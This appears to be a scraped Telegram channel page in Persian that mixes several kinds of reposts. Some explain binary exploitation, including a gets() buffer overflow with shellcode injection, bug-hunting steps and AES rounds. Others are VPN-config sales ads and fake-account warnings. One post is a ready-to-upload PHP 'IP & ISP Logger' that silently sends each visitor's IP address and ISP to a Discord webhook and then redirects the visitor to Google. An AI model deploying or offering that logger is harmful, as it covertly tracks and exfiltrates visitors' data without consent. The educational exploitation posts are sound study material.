3 267
Suscriptores
+824 horas
+37 días
-1530 días
Archivo de publicaciones
3 267
Repost from ReverseEngineering
Binary Exploitation معمولا توی سطح خیلی پایین سیستم اتفاق میافته یعنی باید با چیزایی مثل:
اسمبلی (Assembly)
ساختار حافظه مثل Stack و Heap
نحوهی کارکرد تابعها و برگشت از اونها
سیستمعاملها (مخصوصا لینوکس)
چندتا کاربرد مهم Binary Exploitation :
1 نوشتن اکسپلویت برای برنامههای آسیبپذیر
مثلا یه برنامه C داری که توش بافر اورفلو داره با ساختن یه ورودی خاص میتونید کاری کنید که اون برنامه به جای اجرای کد خودش کدی که شما نوشتی رو اجرا کنه
2 Capture the Flag (CTF)
توی مسابقات امنیتی چالشهای زیادی هست که با باینری اکسپلویت حل میشن این چالشها خیلی برای تمرین خوبن
3 تحلیل بدافزارها
گاهی بدافزارها با روشهایی مثل ROP یا تزریق کد سیستم رو الوده میکنن اگه Binary Exploitation بلد باشید بهتر میتونید عملکردشون رو بفهمید
3 267
Repost from ReverseEngineering
مثال عملی ساده
مثلا برنامهای داری که ورودی یوزر رو میگیره:
char buffer[100]; gets(buffer);اینجا احتمال Buffer Overflow هست با یه فایل ساده حاوی رشتهی بلند برنامه کرش میکنه بعدش با x64dbg مسیر بازنویسی EIP رو دنبال میکنی و یه shellcode کوچیک تزریق میکنی
3 267
Repost from ReverseEngineering
مراحل پیدا کردن باگ در اپلیکیشنها
1 جمعآوری اطلاعات:
بررسی ساختار برنامه dependencyها dllهای بارگذاریشده
2 رفتارشناسی دینامیک:
اجرای برنامه با ابزارهایی مثل x64dbg ، Procmon، Process Hacker
3 تحلیل استاتیک:
استفاده از IDA یا Ghidra برای بررسی کدها رشتهها
4 فاز کردن ورودیها (Fuzzing):
بررسی واکنش برنامه به ورودیهای ناسالم یا دستکاریشده
5 انالیز کرش و Debug:
دنبال کردن کرشها با WinDbg یا x64dbg برای بررسی مسیر باگ
6 ساخت POC یا اکسپلویت:
اگر باگی پیدا شد، یه کد برای اثباتش بساز
3 267
<?php
$discordWebhookUrl = 'Enter the your Disocrd Channel Webhook';
$userIp = $_SERVER['REMOTE_ADDR'];
$isp = json_decode(file_get_contents('https://ipinfo.io/' . $userIp . '/json'));
$data = [
'content' => "**New Visitor Information:**",
'embeds' => [
[
'title' => 'IP:',
'description' => $userIp,
'color' => 333333,
],
[
'title' => 'ISP:',
'description' => $isp->isp,
'color' => 000000,
],
],
];
$options = [
'http' => [
'header' => "Content-type: application/json\r\n",
'method' => 'POST',
'content' => json_encode($data),
],
];
$context = stream_context_create($options);
$response = file_get_contents($discordWebhookUrl, false, $context);
header("location:https://google.com");
?>
✔️| Php Ip & Isp Logger
⚡️| Upload in your website3 267
Repost from 𝗥𝗜𝗣𝗣𝗘𝗥 | شایان
دوستای خوبم سلاااام 😍
بازم مثل همیشه امروز میتونید با هدیه هیجان انگیز کانفیگ های پرسرعت مارو تهیه کنید
سرعت و کیفیت تضمین شده هست 😌👌
من منتظرتون هستم🥲👇
@nika_magician
@prisvpn
3 267
Repost from Black learn 🎫
پایتون آنیسا
عجببب دوره ایههه
برای انبارم شده نگهش دارید
هم این
هم بقیه دوره ها
می خوام باتو پاک کنم تو مسیجاتون باشه حداقل
3 267
Repost from 𝗥𝗜𝗣𝗣𝗘𝗥 | شایان
شب همگی بخیررر😍
از الان تا فرداشب میتونید با هدیه ویژه کانفیگ خریداری کنید 😉
منتظرتونم 😍👇
@nika_magician
@prisvpn
3 267
Repost from 𝗥𝗜𝗣𝗣𝗘𝗥 | شایان
امروز میتونید با خرید کانفیگ هدیه باورنکردنی دریافت کنید 😍❤️
برای خرید به آیدی زیر مراجعه کنید
@nika_magician
@prisvpn
همراه با تضمین سرعت و کیفیت 😍
3 267
Repost from ReverseEngineering
تكرار
این تبدیل ها 9 بار دیگه تكرار میشن در تكرار آخر تركیب ستون ها وجود نداره و با اضافه كردن كلید round متن رمزنگاری شده به دست میاد كلید هم به ترتیب خود شیفت پیدا می كنه گرد میشه و به خودش اضافه میشه.
3 267
Repost from ReverseEngineering
كلیدهای Round
در مرحله بعدی یک كلید round به هر ستون اضافه میشه این كلید در واقع یک تیکه کوچیک از یک كلید محرمانه است كه برای مراحل بعدی رمزنگاری تزریق میشه
3 267
Repost from ReverseEngineering
شیفت ردیف و تركیب ستونها
بایت هایی كه باید رمزنگاری شن توسط جایگذاری تعویض میشن و بعد ردیف ها شیفت پیدا میکنن برای مثال اولین ردیف دست نخورده باقی میمونه ردیف دوم یک محل به راست جابجا میشه سومین ردیف دو محل جابجا میشه و آخرین ردیف نیز سه محل جابجا میشه این پروسه توسط یک فاز تركیب ستونها دنبال میشه كه در آن هر ستون از ماتریس در یک ماتریس دیگر ضرب میشه تا موقعیت ستون تغییر کنه
3 267
این پیج فیکه و به هرکسی پیام بده یا هرچیز دیگه ای بدونید که من نیستم
تشکر ❤️🤓
Telegram @nika_magician
Instagram nicka_ashoori
تنها اکانت های من در شبکه های مجازی
3 267
این پیج فیکه و به هرکسی پیام بده یا هرچیز دیگه ای بدونید که من نیستم
تشکر ❤️🤓
Telegram @nika_magician
Instagram nicka_ashoori
تنها اکانت های من در شبکه های مجازی
